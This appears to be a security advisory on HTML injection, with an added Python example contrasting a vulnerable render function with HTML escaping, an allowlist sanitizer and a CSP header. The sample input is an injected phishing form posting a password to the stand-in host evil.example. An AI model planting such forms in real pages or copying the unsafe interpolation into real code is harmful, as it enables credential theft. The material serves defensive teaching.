The application renders user-supplied HTML content without proper sanitization, allowing attackers to inject arbitrary HTML elements into web pages viewed by other users.
An attacker could inject phishing forms, misleading content, or malicious links to deceive users. This can lead to credential theft, social engineering attacks, or defacement.
Sanitize or encode all user-supplied values at the point they are rendered into an HTML context: HTML-encode plain-text fields, pass rich-text content through an allowlist-based HTML sanitizer, and deploy Content Security Policy headers as defence in depth.
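An added example, not code from the advisory or the affected application: the vulnerable interpolation beside the two remediations above, an HTML-encoding render for plain-text fields and a small allowlist sanitizer for rich text, with a CSP header whose `form-action` directive stops an injected form posting elsewhere. The "bio" field, the allowlist and the sample input are assumptions constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: a profile "bio" carrying an injected phishing form and a bad link.
INJECTED_BIO = ('<form action="https://evil.example/steal"><input name="pw"></form>'
                ' Hi <b>there</b> <a href="javascript:alert(1)">x</a>')

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "a"}   # assumed allowlist
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
# Defence in depth: form-action 'self' keeps any surviving form from posting off-site.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; form-action 'self'")

def render_unsafe(bio: str) -> str:
    """Vulnerable: user-supplied HTML is interpolated straight into the page."""
    return f"<div class='bio'>{bio}</div>"

def render_escaped(bio: str) -> str:
    """Fix for plain-text fields: HTML-encode, so input can never become markup."""
    return f"<div class='bio'>{html.escape(bio, quote=True)}</div>"

class AllowlistSanitizer(HTMLParser):
    """Fix for rich text: re-emit only allowlisted tags/attributes, escape all text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open = [], []    # output chunks, stack of open allowed tags
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # drop the tag; its text content still flows through
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue                # rejects javascript:, data: and similar URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open.append(tag)
    def handle_endtag(self, tag):
        if tag in self.open:            # close only what we opened, in nesting order
            while self.open:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

def sanitize(fragment: str) -> str:
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    p.out.extend(f"</{t}>" for t in reversed(p.open))   # close anything left open
    return "".join(p.out)
```

Note that a dropped `<script>` still leaves its inner text behind as escaped, inert text; the sanitizer removes markup, not words, so a reviewer should expect plain text to survive.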